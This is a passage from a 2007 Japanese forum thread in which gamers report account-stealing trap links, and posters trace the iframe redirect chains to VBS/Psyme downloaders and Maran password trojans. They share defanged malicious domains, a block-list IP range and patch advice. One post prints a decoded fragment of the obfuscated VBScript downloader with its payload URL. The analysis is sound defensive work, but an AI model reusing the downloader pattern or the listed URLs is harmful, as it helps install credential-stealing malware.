(それぞれマイコンピュータのプロパティおよびIEの[ヘルプ]-[バージョン情報]で確認可)

あともう1点、カスペのログを見て、検出されたウイルスの名称も教えて欲しい。
RODLL.DLLとか見つかってるなら、多分アカハックウイルスに感染してるっぽいから、
OS再インストールコースが無難な選択になると思うけど、
そもそも今回あっさり感染した理由は、あなたのPCがかなり脆弱な状態であった可能性があるので
再発防止のためにも、そのあたりをきっちり調べておきたいわけです。

760 名前: ◆sp4Sh9QXGI :07/04/20 11:48 ID:lyfptWdC0
更新( ・ω・)ノ⌒■
今回からPG2ブロックリストの通常版に
jprmthome系列がよく利用しているIP帯(222.77.185.83-222.77.185.110)
を一括登録しています。
最近この系列の活動が活発で、いささか更新が面倒になってきたので…
今回更新したドメインリストも、これらの例外から漏れていませんでした。
心境 → また奴等かよ>('A`)

Ragnarok Searchの錯誤狙いドメインには特に注意したほうがよさそうですね。
本物は“ragnarok-search.net”ですが、知らない人は踏んでしまいそう。
これは管理人さんに報告すべきなんでしょうかね…。

761 名前:(^ー^*)ノ〜さん :07/04/20 12:29 ID:0sUi45Rg0
サーチさんに注意を呼びかけてもらうのは有効そうですね。
誰か見てくれれば人づてに広がっていってくれるかもしれませんし。

762 名前:(^ー^*)ノ〜さん :07/04/20 12:34 ID:n6f3dvEm0
>>658
>lmydj■vip■5944■net/mm■htm
>mm■htmのVIRUSTOTAL結果、明暗はっきり

使用中のNOD32で検知できていなかったようなので報告してみた。

----- 引用開始 -----
検体アドレスからダウンロードいたしましたファイル
「mm.html」がウイルス定義2205(20070419)で、以下のように
検出されることを確認致しました。また、同アドレスに
アクセスした際にIMONで検出されることを確認しました。

「VBS/TrojanDownloader.Psyme.DE トロイ」
----- 引用終わり -----

763 名前:(^ー^*)ノ〜さん :07/04/20 13:08 ID:zJ5NMlcC0
知り合いのブログのコメントが自然なものだったためふんでしまいました。
カペルでスキャンしましたがなにもでず、他にしたほうがいいことがあったら
お教えください。
【  アドレス   】ttp://www■fcty-net■com
【気付いた日時】 4/20 10:00頃(リンク先とんですぐです)
【     OS    】 Vista
【使用ブラウザ 】 Lunascape4 Version 4.1.3
【WindowsUpdateの有無】 前日の23:00頃
【 アンチウイルスソフト 】 カペルスキー
【その他のSecurty対策 】 ルーターのFW
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンで反応無
【スレログやテンプレを読んだか】 ざっと読みました
【説明】
リンク先をみたところROと関係のないうえに画像だったのでおかしいとおもい
テンプレをみたところ危険なところにURLが載っていたのでまずいと思いました。
別PCでIDパスは変更して、該当PCでスキャンしましたが反応が出ず
感染したかどうかもよくわかりません。
言葉足らずかと思いますがアドバイスお願いします。

764 名前:(^ー^*)ノ〜さん :07/04/20 13:12 ID:U/AQAmGJ0
>>762
そこの123.exe、18日に差し替わっている模様。

765 名前:(^ー^*)ノ〜さん :07/04/20 13:53 ID:51Qzls+i0
>>763
とりあえず、罠サイトの方を調べてみた。
www■fcty-net■com (iframeが2つ↓)
→ www■fcty-net■com/img/fcty■jpg
→ www■good1688■com/info/cezhi/  (←VBS/Psyme VBScriptにより以下の2ファイルをダウンロード&実行)
 → www■good1688■com/info/cezhi/cezhi■exe
 → www■good1688■com/info/cezhi/msn■exe

JPEG画像の方はただの画像かな?
ダウンロード部はVBScriptによるものだから、
Geckoエンジン使ってたか、Trident使ってたかで明暗が分かれるところだね。

766 名前:(^ー^*)ノ〜さん :07/04/20 13:58 ID:U/AQAmGJ0
>>726 のnPack圧縮が少しずつ使われている模様。
例:www■fanavier■net/games/server.exe

767 名前:(^ー^*)ノ〜さん :07/04/20 14:20 ID:U/AQAmGJ0
>>765
ありゃ、最近はMSNMessenger(WindowsLiveMessenger)の
パス抜きは辞めたと思ってたのになぁ。
ブログのアカハックなんかにも使えるのかもね。

768 名前:(^ー^*)ノ〜さん :07/04/20 14:39 ID:pglECn0C0
RMCの取引関係にも垢ハックURL張られてたわ
めんどくせ(´A`)

769 名前:中華の人 :07/04/20 16:45 ID:nXtAKXdb0
垢ハックくらい別にいいじゃないか・・・・・・

770 名前:にゅぼーん :にゅぼーん
にゅぼーん

771 名前:(^ー^*)ノ〜さん :07/04/20 17:16 ID:VstkK8MX0
全部読んでないけど、垢ハクじゃなくてID/パス教えてパクられてただけじゃん?

772 名前:(^ー^*)ノ〜さん :07/04/20 17:26 ID:f5orRg1H0
>>770
直接の晒しでなくても、晒しスレとかのアドレスも削除対象。
依頼出して来い。

773 名前:765 :07/04/20 17:28 ID:51Qzls+i0
>>763,765
VBS/Psymeについて
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CHM%5FPSYME%2EB
ttp://www.mcafee.com/japan/security/virPQ2003.asp?v=VBS/Psyme

要約すると、Internet ExplorerのADODB.Streamの脆弱性を利用して、
任意のファイルをユーザーのコンピュータにダウンロードして実行する。
脆弱性を塞いでおけば感染しないはず。詳細は以下のリンクを参照のこと。

Internet Explorer で ADODB.Stream オブジェクトを無効にする方法
ttp://support.microsoft.com/kb/870669/ja

レジストリに以下のキーが存在し、
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}
以下の値がセットされていれば、脆弱性は塞がっている。
Compatibility Flags=0x400 (種類=REG_DWORD)

なお、これ自体は2004年に発見された脆弱性なので、Windows Updateを普段から行っていれば、問題なく防げる。
なんてことは>>502にも書いてあるけど再掲。

774 名前:763 :07/04/20 21:03 ID:zJ5NMlcC0
>>773
VBS/Psymeについてがよくわかっていなかったのですが
おかげさまでわかりました。ありがとうございます。
以後気をつけます。

775 名前:(^ー^*)ノ〜さん :07/04/21 00:11 ID:LfQ4dFeM0
毎度の福建人のドメイン名はあちらのブログ?にも登場する。

【情報】台湾のゲームブログ?の危険ドメインリスト
www.gamez.com.tw/thread-391115-4-1.html

07-4-19 10:44 PMの記事に危険ドメインリストがある。
サイトの内容とそのリストに連中のものもあるところから見てオンラインゲーム狙いの危険ドメイン。
それにしても未出のものが結構あるようだ。

776 名前:(^ー^*)ノ〜さん :07/04/21 02:11 ID:I+nH4e/M0
>>775
そこには出典元はかかれてないけど、リネージュ資料室さんのデータっぽい。
全てリネージュ資料室さんとこに載ってたんで。

777 名前:(^ー^*)ノ〜さん :07/04/21 10:09 ID:LfQ4dFeM0
いつもの福建人が新たに取得したドメインが5つ。
今回はほぼ5分おき、なんちゃってわいわいカキコ登場。

登録情報は毎度おなじみにつき省略。
Domain Name ..................... 23styles■com
Expiration Date ................. 2008-04-19 13:02:11

Domain Name ..................... ezbbsy■com
Expiration Date ................. 2008-04-19 12:40:26

Domain Name ..................... livedoor-game■com
Expiration Date ................. 2008-04-19 12:45:23

Domain Name ..................... m-phage■com
Expiration Date ................. 2008-04-19 12:50:22

Domain Name ..................... yy14-kakiko■com
Expiration Date ................. 2008-04-19 12:55:37

778 名前:(^ー^*)ノ〜さん :07/04/21 11:38 ID:Oc85bPTl0
カキコw

779 名前:(^ー^*)ノ〜さん :07/04/21 11:51 ID:LfQ4dFeM0
OFSfb-20p3-53.ppp11.odn.ad.jp
を使ったアカハク書き込みが19日にあった、リモホをぐぐると出てくる。
またODNなわけだが。

ホストをIPに変換したアドレスでアクセスするとMikroTik?のページに飛ぶ。
なんかのサーバ?

同リモホは20日にはリネージュ資料室のハエ取り紙にかかってる。

塞いでも問題なさげではある。

780 名前:(^ー^*)ノ〜さん :07/04/21 12:13 ID:yUIsv0Ck0
>>779
先方のルータの管理画面のようだ。

781 名前:(^ー^*)ノ〜さん :07/04/21 12:15 ID:pIaKmC/A0
踏み台にされているのかもな

782 名前:(^ー^*)ノ〜さん :07/04/21 12:44 ID:yUIsv0Ck0
ネカフェとかじゃね? 個人で入れるような物には見えん。

783 名前:(^ー^*)ノ〜さん :07/04/21 13:47 ID:thL58FA50
カスペっていうスキャンソフトは優秀なのか?
うちはAVGとオンラインスキャン使ってるんだが

784 名前:(^ー^*)ノ〜さん :07/04/21 14:06 ID:y+8wjH110
まあ優秀。
ノートンやバスターみたいな古いウイルスにしか反応せず
新種のウイルスにはまるで無力なカスソフト使っているなら超優秀に感じると思う。

でもどんなソフト使ってもすり抜けるウイルスは存在するから過信は禁物。

785 名前:(^ー^*)ノ〜さん :07/04/21 14:36 ID:NYRq1X0c0
その分値段も張るがな。
しかし、そこまで差があるものなのか?
優秀さを体感しようと思ったら、検体落としまくるとか
あるいはもう罠踏んで感染しまくるしかないと思うのだが・・・

786 名前:(^ー^*)ノ〜さん :07/04/21 14:38 ID:Eeyw/QUt0
安心料みたいなモンだよ
そんなに効果を実感出来る環境とか考えたくもない

787 名前:(^ー^*)ノ〜さん :07/04/21 16:25 ID:jL/gF5MB0
KAVのエンジン積んだフリーのAVSってのもあるぞ。
提供してるのがAOLだし手放しで薦めるわけにはいかんが。
ttp://pc11.2ch.net/test/read.cgi/sec/1170858305/

788 名前:(^ー^*)ノ〜さん :07/04/21 16:40 ID:yUIsv0Ck0
AOLが個人情報を集めるための物だからなー…。
KasperskyエンジンはOEM先が多いね(代表的なのはF-Secureか)。
性能比較すると上位グループの半数ほどがOEMになったりする。

# F-Secureに検体を送る人はKasperskyに直接送ったほうが早いぞ。

789 名前:(^ー^*)ノ〜さん :07/04/21 17:04 ID:LfQ4dFeM0
もう1つ福建人ドメイン発見、既に使われ始めている。
blogディレクトリに罠がある。
Domain Name ..................... lian-game■com
Expiration Date ................. 2008-04-12 12:24:26

790 名前:(^ー^*)ノ〜さん :07/04/21 17:28 ID:yUIsv0Ck0
乙です。
www■blog-ekndesign■com/blog/see.exe
いつもの(?)UpackなMaranでした。

791 名前:(^ー^*)ノ〜さん :07/04/21 19:22 ID:n/GZGtqX0

ひっとん
神器材料買取してます、何かあればお声をおかけください。
白ポ?青ポ?白スリム?塩酸?火炎瓶は販売の他、材料との交換も行ってます。
販売価格及び交換比率は各自お問い合わせください。
その他応相談 ※身内特典あり(詳しくは本人まで)

http://xiwangtukq■blog100■fc2■com/

RO歴史の上で最も変態の装備.
 意外にも1つの国民中学校に出て手を生みます!!
 詳しい情況−−

http://xiwangtukq■blog100■fc2■com/


パンヤの公式サイトに貼り付けてあり、うっかり踏んでしまいました・・・orz
変なブログのようなサイトでして、文字化けだらけだったです。
いまのところ、垢ハック(まだ5時間しかたってませんが)はされてませんが、
このサイトが大丈夫なのか、それとも垢ハック確定のサイトなのか
判定おねがいします。
垢ハックのサイトでしたら、友人に装備を全部あげて引退しようと思います。
どうかよろしくおねがいします(´・ω・`)

792 名前:(^ー^*)ノ〜さん :07/04/21 19:26 ID:NgDqtPUQ0
不安に思うならネカフェなりいってパス変更してこい
その後ゆっくり対応すりゃいいだろうが
馬鹿じゃねーの

793 名前:(^ー^*)ノ〜さん :07/04/21 19:28 ID:pIaKmC/A0
引退おめでとう

794 名前:(^ー^*)ノ〜さん :07/04/21 19:30 ID:3YcINiGB0
ttp://xiwangtukq■blog100■fc2■com/
iframe有り
ttp://www■twsunkom■com/1234.htm
※このアドレスは危険URLのひとつです。
危険!VBS/Psymeを発見!
ブラクラチェックが終了しました。


せめてテンプレ埋めるとかさ、URL鑑定スレじゃないんだし
最初から駆除やら対応する気がないのはどうなのよ

795 名前:(^ー^*)ノ〜さん :07/04/21 19:30 ID:p4LvP/680
垢ハックサイトなのかはしらないがお前がその後ROにログインしてなければパスは
盗まれてない可能性が高いだろう。
とりあえずカスペなりでウイルススキャンしてみろ

796 名前:(^ー^*)ノ〜さん :07/04/21 19:30 ID:3YcINiGB0
htm前の.置換し忘れた、すまぬ

797 名前:(^ー^*)ノ〜さん :07/04/21 19:34 ID:3YcINiGB0
余談だけどパンヤサイト内をfc2で検索すると出てくるね
会員登録してログインしないと書き込めないところにまで進出とはね…

798 名前:791 :07/04/21 19:42 ID:n/GZGtqX0
とりあえず、ROはつけっぱのままで、再ログインはしてません(現在もROはつけてる)
とりあえず、カスぺで検索してみます。

垢ハックだったらどうしようT-T

799 名前:(^ー^*)ノ〜さん :07/04/21 19:59 ID:3YcINiGB0
見えてねぇ…
てかパンヤ掲示板で犠牲者増やしてやがる…

>>792
ネカフェ勧めるのもどうかと思うんだ

800 名前:791 :07/04/21 19:59 ID:n/GZGtqX0
カスペルスキーオンラインスキャナ→重要な領域では、ウイルスは検索しませんでした。
次はカスペルスキーオンラインスキャナ→マイコンピューターで検索してみます。

この2つが検索されなかったら安全・・・ですかね?

801 名前:(^ー^*)ノ〜さん :07/04/21 20:01 ID:KnD6rw+70
だったらどうしようT-Tもなにも100%垢伯だろうが。
引退するんでしょ?するなら早くすれば?
少しでもあがきたいならとっととスキャンなりかけて来い('A`)

802 名前:(^ー^*)ノ〜さん :07/04/21 20:01 ID:Oc85bPTl0
なんつーか、あからさまに怪しい書き込みのURLを踏む不注意さもそうだが、
テンプレも埋めない、垢ハクだったら引退とか、駆除する気がなさそうなので
アドバイスもしたくないのだが、垢ハク認定もらいたいだけならVBS/Psymeは
垢ハクトロイだ。
ただ、WinUpdateしてれば防げる脆弱性を付いたものだから、Updateしてれば
問題ない。
してなければ南無。

803 名前:(^ー^*)ノ〜さん :07/04/21 20:02 ID:p4LvP/680
・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね?
  100%の保証は出来ません。ウィルスが見つからなかった場合、チェックに使った
  アンチウィルスソフトでは発見出来なかっただけです。本当にウィルスが居ないのか、
  それとも検知を免れているだけなのかは判りません。
  自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです

テンプレぐらい読んで来い

804 名前:791 :07/04/21 20:05 ID:n/GZGtqX0
いえ、垢ハックされて、中華に貢ぐよりは、仲間へと思い、そう書きました。
不快に思えたらなら謝罪します。ほんとすみません。

私のPCはWinMXで、周1くらいでWin Updateしています。
テンプレ熟読してないのは、ほんとすみません。

805 名前:(^ー^*)ノ〜さん :07/04/21 20:13 ID:kyxxtyFR0
もし感染してても「踏んだ後にパスを入力してなければ」大丈夫のはず。
その知り合いが信頼できる方であれば、知り合いに新規垢でも作ってもらって全財産預かって貰うって手もある。
とりあえず怖ければHDDフォーマットして再セットアップ。
とりあえずそういう所に突如張られるURLはまず疑う事から始めましょ。

806 名前:(^ー^*)ノ〜さん :07/04/21 20:14 ID:56Xz5NMS0
>>791
垢ハック踏んでるのは確実なんだから、いいから除去しる。除去するまでパスワード入力するなよ。

>私のPCはWinMXで、周1くらいでWin Updateしています。
ぉぃ。

# ここまでぞんざいに扱われる被害(?)者も珍しいなw その扱いは当然なんだけどさ。

807 名前:(^ー^*)ノ〜さん :07/04/21 20:19 ID:ougT4xSz0
散々言われただろうがもう一度。
文章中に半角で「?」とあったら中華(文字化け)

808 名前:(^ー^*)ノ〜さん :07/04/21 20:32 ID:Oc85bPTl0
慌てる気持ちもわかるが、慌てたところでミスが増えるだけで何かが好転するわけでもない。
パス入力さえしなければハクられることもないし、その前に気付けたことを幸運と思ってモチツケ。

809 名前:(^ー^*)ノ〜さん :07/04/21 20:47 ID:pOFpAupz0
WinMXでWinUpdateしてるってのがどういう意味なのかが理解できん。
MXで更新ファイル手に入れてるってことなのか?
誰か教えてくれ('A`)

810 名前:(^ー^*)ノ〜さん :07/04/21 20:52 ID:Oc85bPTl0
MEの書き間違えじゃね?
XPだったら間違えすぎだが。
とりあえずMEならOS換えたほうがいいぞ。

811 名前:(^ー^*)ノ〜さん :07/04/21 20:52 ID:p4LvP/680
俺もさっぱりわからねーがただの勘違いじゃないか・・・たぶん
winMXとかいちいち言う必要ないし・・・

812 名前:(^ー^*)ノ〜さん :07/04/21 20:59 ID:pOFpAupz0
なるほどMEか・・thx
というかMEってまだサービス続いてたのか。

全然PCわからなそうな人でもMXやってるんだな、とか思ってしまったよ。

813 名前:791 :07/04/21 21:08 ID:n/GZGtqX0
すみません、てんぱってました。
WINMEじゃなくて、XPです。
あと、マイコンピューターをウイルススキャンしたら5つウイルスが見つかりました。
いま、そのウイルス名報告します。。
この後HDDフォーマットして、再セットアップする予定です。
親切にありがとう。

814 名前:(^ー^*)ノ〜さん :07/04/21 21:09 ID:zRlAAW010
斜め上

815 名前:(^ー^*)ノ〜さん :07/04/21 21:21 ID:56Xz5NMS0
報告しなくていいからとっととHDDフォーマットしろ。

816 名前:(^ー^*)ノ〜さん :07/04/21 21:27 ID:Oc85bPTl0
よく今まで無事だったというか何というか。
つか、5個も見付かったならRO以外の情報漏洩とかを心配したほうがいいんじゃね?
とにかく、再インスコしたらフリーでいいからアンチウィルスソフト入れとけ。
面倒だからといって入れないで、また再インスコする羽目になるのはもっと面倒だろ?

817 名前:(^ー^*)ノ〜さん :07/04/21 21:29 ID:Oc85bPTl0
途中送信しちまったが、アンチウィルスソフト入ってても無警戒でアドレス踏んでたら
感染は時間の問題だからな。

818 名前:(^ー^*)ノ〜さん :07/04/21 21:36 ID:fBa5F0ACO
しかし、再インスコしてアップデートしようとネットにつなぐだけで
ウィルス感染の危険が。
XPならFWある分まだましか

819 名前:682 :07/04/21 21:42 ID:+FpAKxlJ0
報告。
徹底的にカスペ・S&D・ADaware各種更新・スキャン繰り返し
完全に検知0になりました。
装備・倉庫とも現在のところ無事なのも確認。
こちらのPCのセキュリティも確認できましたしいい勉強になりました。
あとは自己責任の判断にてログイン致します。
皆様の暖かい意見とアドバイスに大変お世話になりました。m( )m
犯人に隕石落ちる事と被害者減る事を祈って名無しに戻ります。

820 名前:(^ー^*)ノ〜さん :07/04/21 21:45 ID:BBlWbYX70
【  アドレス   】 www■m-phage■com/bbs
【気付いた日時】 1時間ほど前
【     OS    】 Windows XP Service Pack 2
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 今日
【 アンチウイルスソフト 】 ウィルスバスター2007
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 カスペルスキーオンラインスキャン
             ウィルスバスター/Spybot S&D/NOD32 すべて検知なし
【スレログやテンプレを読んだか】 (Yes)

 とんだ先が画面真っ白で、びっくりして検索。
ツールチェッカーかけてみたら危険!の文字が・・・
たまたま今日はRO繋いでませんが、大丈夫なんでしょうか・・・?

821 名前:(^ー^*)ノ〜さん :07/04/21 21:47 ID:BBlWbYX70
820です
これかかれてたアドレスは、つい最近発売されたDSゲームのwikiのメニューバー
にありました。
なぜそんなとこに・・・

822 名前:(^ー^*)ノ〜さん :07/04/21 21:49 ID:Oc85bPTl0
わかっててログインするなら止めないが、ログインするにしろ、友人に装備一式預けて
ハクられるかどうか一日くらい様子見したらどうだ?

823 名前:(^ー^*)ノ〜さん :07/04/21 22:01 ID:56Xz5NMS0
>>820
垢ハックかどうかは知らないけど、VBスクリプト。
数値で記載されていて、数値をキャラクタに変換して…と検知を回避するなにかの模様。

危険なことは危険だけど、ROの垢ハック以外のものの可能性もあるね。

仮想環境用意してないので、動作確認はパス。

824 名前:(^ー^*)ノ〜さん :07/04/21 22:01 ID:IdpNHG+W0
ROをつないでないのなら、垢ハックはまだ大丈夫。
感染してる可能性があるので、安心したいならHDD再インストール。
奪われる覚悟があるのなら、そのままでどうぞ。

825 名前:(^ー^*)ノ〜さん :07/04/21 22:11 ID:3YcINiGB0
パンヤ界は平和だな、無害URL指定されてる

826 名前:(^ー^*)ノ〜さん :07/04/21 22:17 ID:Oc85bPTl0
>>825
マジかw
確かにパンヤには無害だろうが、中にはパンヤとRO両方やってるのもいるだろうに・・・
それ以前にトロイ仕込まれるのに無害とはこれ如何に。

827 名前:(^ー^*)ノ〜さん :07/04/21 22:23 ID:ROpW+guv0
つーかどんどん手が込んできてるな……
簡単な言葉にするのは難しいが
ウィルスとかトロイとかそういうLvじゃなくなってるぜ……

828 名前:(^ー^*)ノ〜さん :07/04/21 22:33 ID:aV/L22l+0
あちらさんはゲーム、遊びじゃなくてビジネスとしておまんま食うためにしてるからな
「こんなに儲かる仕事はない。満足している」なんてインタビューに答えるくらいだから

829 名前:(^ー^*)ノ〜さん :07/04/21 22:39 ID:YItvh+Tq0
だから情や良心が介入する余地がない。だから手心など全くない

830 名前:(^ー^*)ノ〜さん :07/04/21 22:42 ID:3YcINiGB0
>>826
もっと怖いのは伏せてあるURLにもかかわらず何人も確認しに踏んでるところ
しかしあれだけ自信げに言われるとこっちが間違ってる気がしてきたぜ…

831 名前:(^ー^*)ノ〜さん :07/04/21 22:42 ID:pIaKmC/A0
実は中華の自演かも知れないぞ

832 名前:(^ー^*)ノ〜さん :07/04/21 22:51 ID:L/ah99pi0
それだ!

833 名前:(^ー^*)ノ〜さん :07/04/21 23:41 ID:lvEjKXXD0
>820
そこのVSスクリプトを変換したら次のようになった。
---------------
>on error resume next
>eurl_0="http://www■ezbbsy■com/bbs/ro■exe"
>wbb41a="Adodb.St"
>ebb52k="r"
>gbb03q="eam"
>ess71x="M"
>fss12k="i"
>hss63p="crosoft.XMLHTTP"
(以下略)
---------------
まあファイル名から予想は付いたが、念のためDLして確認してみたら
Trojan-PSW.Win32.Maran.cjですた。

というわけで、思いっきりROの垢ハクウィルスを仕込む罠。

834 名前:(^ー^*)ノ〜さん :07/04/21 23:50 ID:WQupkCdr0
>>820
www■m-phage■com/bbs/ (VBS/Psyme。以下のファイルをダウンロード&実行)
→ www■ezbbsy■com/bbs/ro■exe (TSPY_MARAN.D)

ダウンローダがVBS/Psymeで、本体(ro.exe)はMARAN系トロイ。
本体の方はウイルスバスター2007で検出できました。(ダウンローダの方はバスターでは検出不可)
WindowsUpdateしてあるようですので、ダウンロードが失敗してるはずですが。

当然ながら最終的には自己責任でお願いします。

835 名前:(^ー^*)ノ〜さん :07/04/22 00:18 ID:7V38FAaj0
>820です
 詳しくありがとうございました。
あのあと怖いので新規垢とってRO内放置してますが、ログインされていません。
大丈夫みたいですね。
お世話様でした。

836 名前:(^ー^*)ノ〜さん :07/04/22 00:25 ID:qqJFHBmC0
>>835
バスターが検知して止めたわけじゃないんだよな?
とりあえずもう少し放置して様子見たほうがいいと思うが・・・
今くらいのログイン率高い時間に入ってログイン合戦するのを避けるために
明け方〜午前中くらいに入る可能性も大いにある。

837 名前:(^ー^*)ノ〜さん :07/04/22 00:35 ID:7V38FAaj0
>836さん
 IEのセキュリティで 安全だとマークされてないスクリプト実行無効にする
って設定してるんですが、ここでとめられたんでしょうか?
バスターが感知して止めたわけではありません。踏んだときは無反応でした。

838 名前:(^ー^*)ノ〜さん :07/04/22 00:41 ID:qqJFHBmC0
>>837
すまん、見逃してた。
WinUpdateしてるならバスターの挙動に関わらず踏んでも問題ないと思う。

839 名前:(^ー^*)ノ〜さん :07/04/22 00:44 ID:7+jCZolx0
対策の中に書いてないが、hostsの変更やPG2の導入はしていない?

>【WindowsUpdateの有無】 今日
これは踏む前か踏んだ後か、どっち?
Adodb.Streamの脆弱性を使ってるタイプだから、常々WindowsUpdateしてたら
防げてるとは思うんだが。

840 名前:820です :07/04/22 00:47 ID:7V38FAaj0
 WindowsUpdateは踏む前にしてました。
hostsの変更やPG2の導入はしてません。

841 名前:(^ー^*)ノ〜さん :07/04/22 00:48 ID:U5B+SDVu0
>>826
がめぽ垢のハックトロイが開発されるのも時間の問題だな。

842 名前:(^ー^*)ノ〜さん :07/04/22 08:05 ID:WD1F27s80
【  アドレス   】http://www■aaa-livedoor■net/ro-navi/
【気付いた日時】 07/04/22 02:30
【     OS    】 XP SP2
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】有 最後の更新は約1週間前の4/13
優先度の高い更新プログラムは現在ありませんでした。
【 アンチウイルスソフト 】 ウィルスバスター2006
【その他のSecurty対策 】 S&D、ルータ、カスペルスキーオンラインスキャン、マカフィーオンラインスキャン
【 ウイルススキャン結果】S&Dでのみ、1件「TagASaurus」を検出。(広告表示のプログラムで無関係の様です)
他、ウィルスバスターや数箇所のオンラインスキャンを夜を徹して行いましたがHitはありませんでした。

【スレログやテンプレを読んだか】 Yes
上記のアドレスも既に何度か投稿されており戦慄しております

【説明】
RMCの引退装備売スレに紛れていました。ROやりながらだったのでAlt+Tabでウィンドウを置き換えた時にうっかり…。
リンク先は画面真っ白で、特に文字等はありませんでした。
現在はROを落としてまだ一度もログインしていません。
未熟者が丸投げしているのは見ていて滑稽だとはわかっていますが、自分でわかるのはこれが限度です。
どうか御指導をお願いします。

843 名前:(^ー^*)ノ〜さん :07/04/22 08:19 ID:6izxbOKP0
RMCはあちこちの記事に垢ハクアドレスが大量投下されてるからな
下手な鉄砲も数撃ちゃ当たるってか

844 名前:(^ー^*)ノ〜さん :07/04/22 08:31 ID:771ecEqW0
このスレ初めて見たけど、あまりにも大げさなテンプレにワロタ
てかIE使ってる奴は何かの罰ゲームなの?

845 名前:(^ー^*)ノ〜さん :07/04/22 08:42 ID:Imz2nCbr0
>>842
>【スレログやテンプレを読んだか】 Yes

じゃあやるべきことはもう分かってるだろ?
再インストールがメンドクサイ、ってなら好きにすれば?

846 名前:(^ー^*)ノ〜さん :07/04/22 08:46 ID:JmJkuK4J0
つか、こんだけアカハックが騒がれてるのにいまだIE使い続けてる奴はなんなの?
そんなんアカハックして下さいって言ってるようなもんだろ、FireFox使え(・∀・)/ヾ〜〜╋┓!!!

847 名前:(^ー^*)ノ〜さん :07/04/22 08:51 ID:QF3gXM7V0
>>846
FireFoxで感染した例もあるんだ、そう言ってられないぞ

848 名前:(^ー^*)ノ〜さん :07/04/22 09:19 ID:nnZ81cIa0
>>843-844 >>846
雑談はLiveROへどうぞ。

>>842
wz.htm と wu.htm を読みに行く奴。>>689-690>>698で、カスペのオンラインスキャンで検知可能だと
報告が出ている。

検知可能なものが出てこないので、入手前に切断できたと判断するか、「現時点では検知できない新型に
差し替えられていた」為に検知しないだけで感染していると判断し、OS入れなおしを敢行するかは
自己責任の範疇ということになる。

849 名前:(^ー^*)ノ〜さん :07/04/22 09:19 ID:6izxbOKP0
>>847
圧倒的に感染率が低いのも事実

850 名前:(^ー^*)ノ〜さん :07/04/22 09:19 ID:U5B+SDVu0
FireFoxなんてブラウザは存在しない訳だが

851 名前:(^ー^*)ノ〜さん :07/04/22 09:23 ID:MyAiI/bk0
>>842
www■aaa-livedoor■net/ro-navi/  (↓frameタグ2個)
→ www■aaa-livedoor■net/ro-navi/wz■htm  (↓imgタグwidth=height=0で拡張子gifのhtmlファイルが1個)
 → www■aaa-livedoor■net/ro-navi/img■gif  (一見した限りは、特にやばくはなさそう)
→ www■aaa-livedoor■net/ro-navi/wu■htm  (↓iframeタグ1個)
 → www■aaa-livedoor■net/ro-navi/happy1■htm  (VBS/Psyme。↓のファイル1個をダウンロード&実行)  
  → www■ro-bot■net/ro-navi/yan■exe  (トロイ本体。TROJ_MARAN.FU)

まあ、いつものパターンです。
本体(yan.exe)の方はウイルスバスターでTROJ_MARAN.FUとして検出可。
ダウンローダ(happy1.htm)はバスターを含め、ほとんどのウイルス対策ソフトで検出不可。
でも、内容からしてVBS/Psymeであることは確実。

重ね重ね言っておくけど、最終的には自己判断&自己責任でよろしく。
あなたが罠を踏んだ時間≠私が罠を調べた時間である以上、
内容が指し変わってる可能性もありますので。

852 名前:(^ー^*)ノ〜さん :07/04/22 09:42 ID:nnZ81cIa0
>>842
…一部、差し替えられてるな。
一応は既知のものの様子だが1つ亜種の可能性があった。
NOD32では検知できたので、NOD32でのスキャンもお勧めしておく。

-----
wu■htm
-----
次のページをiframeで開こうとする。
1■htm
2■htm

-----
wz■htm
-----
現時点では、なにもない。ここまでは一緒。

-----
1■htm
-----
VBスクリプトで下記のファイルを入手し、実行させよとする模様。
http://www■blog-livedoor■net/game/svch■exe ではなく、
http://www■ro-bot■net/ro-navi/yan■exe になっている。
NOD32 検出名:Win32/PSW.Maron トロイの亜種

スクリプト中にある「L_fy80■exe」ってのは、一時的に作成するものかな。
(スクリプト読めなくてごめん)

こいつは、4/19段階で、Trojan-PSW■Win32■Maran■cj であり、次回更新に含めるって
返答来ているので、現時点では検知可能な筈。

exe自体が差し替えられている可能性も疑わないといけないのが厄介。
NOD32で検知した後、自動提出が行われたので、新型の亜種の可能性有り。

853 名前:(^ー^*)ノ〜さん :07/04/22 09:43 ID:nnZ81cIa0
-----
2■htm
-----
下記のスクリプトを読み込む。iframeはsrc="http://" で未完成。
http://www■blog-livedoor■net/game/muxiao■js ではなく
http://www■ro-bot■net/ro-navi/muxiao■js

-----
http://www■ro-bot■net/ro-navi/muxiao■js
-----
カーソルとして、下記のファイルを表示させようとする。
http://www■ro-bot■net/ro-navi/muxiao1■jpg
http://www■ro-bot■net/ro-navi/muxiao2■jpg

muxiao1■jpg
muxiao2■jpg
NOD32:検出名 Win32/TrojanDownloader.Ani.Gen トロイの亜種
http://www■ro-bot■net/ro-navi/yan■exe を入手しようとする。

854 名前:(^ー^*)ノ〜さん :07/04/22 09:44 ID:nnZ81cIa0
被った…てか、ちょっとの差で、wz.htmも中味あったのか。

855 名前:(^ー^*)ノ〜さん :07/04/22 10:02 ID:nnZ81cIa0
よく見たら、差し替えられてる訳じゃなく、構成が同じだけか…誤報すまん。
検体入手しようとしてて、一瞬ファイルが見つかりませんが出て、暫く待ってから試したら入手できたとかの
挙動があったので、もしかすると現在進行形で更新中なのか、それとも、回線の問題か。

www■ro-bot■net/ro-navi/yan■exe はカスペのオンラインスキャンで「Trojan-PSW.Win32.Maran.cj」と
検知できることを確認。jpeg偽装のアニメカーソルも、「Exploit.Win32.IMG-ANI.k」として検知しました。

851さんが言われていますが「罠を踏んだ時間≠私が罠を調べた時間」であり、差し替えられているため
踏んだ時点のものが検知されなかっただけという可能性も忘れないようにしてください。

踏んだけど、サーバーが重いなどの要因で、本体入手前に切断できたので、検知しないのか、
タイミングの問題で、検知できないものを入手してしまったのかの判断ができません。
スキャンしたソフトを信用するか、HDDをフォーマットするかは、自己責任で判断願います。

856 名前:851 :07/04/22 10:02 ID:MyAiI/bk0
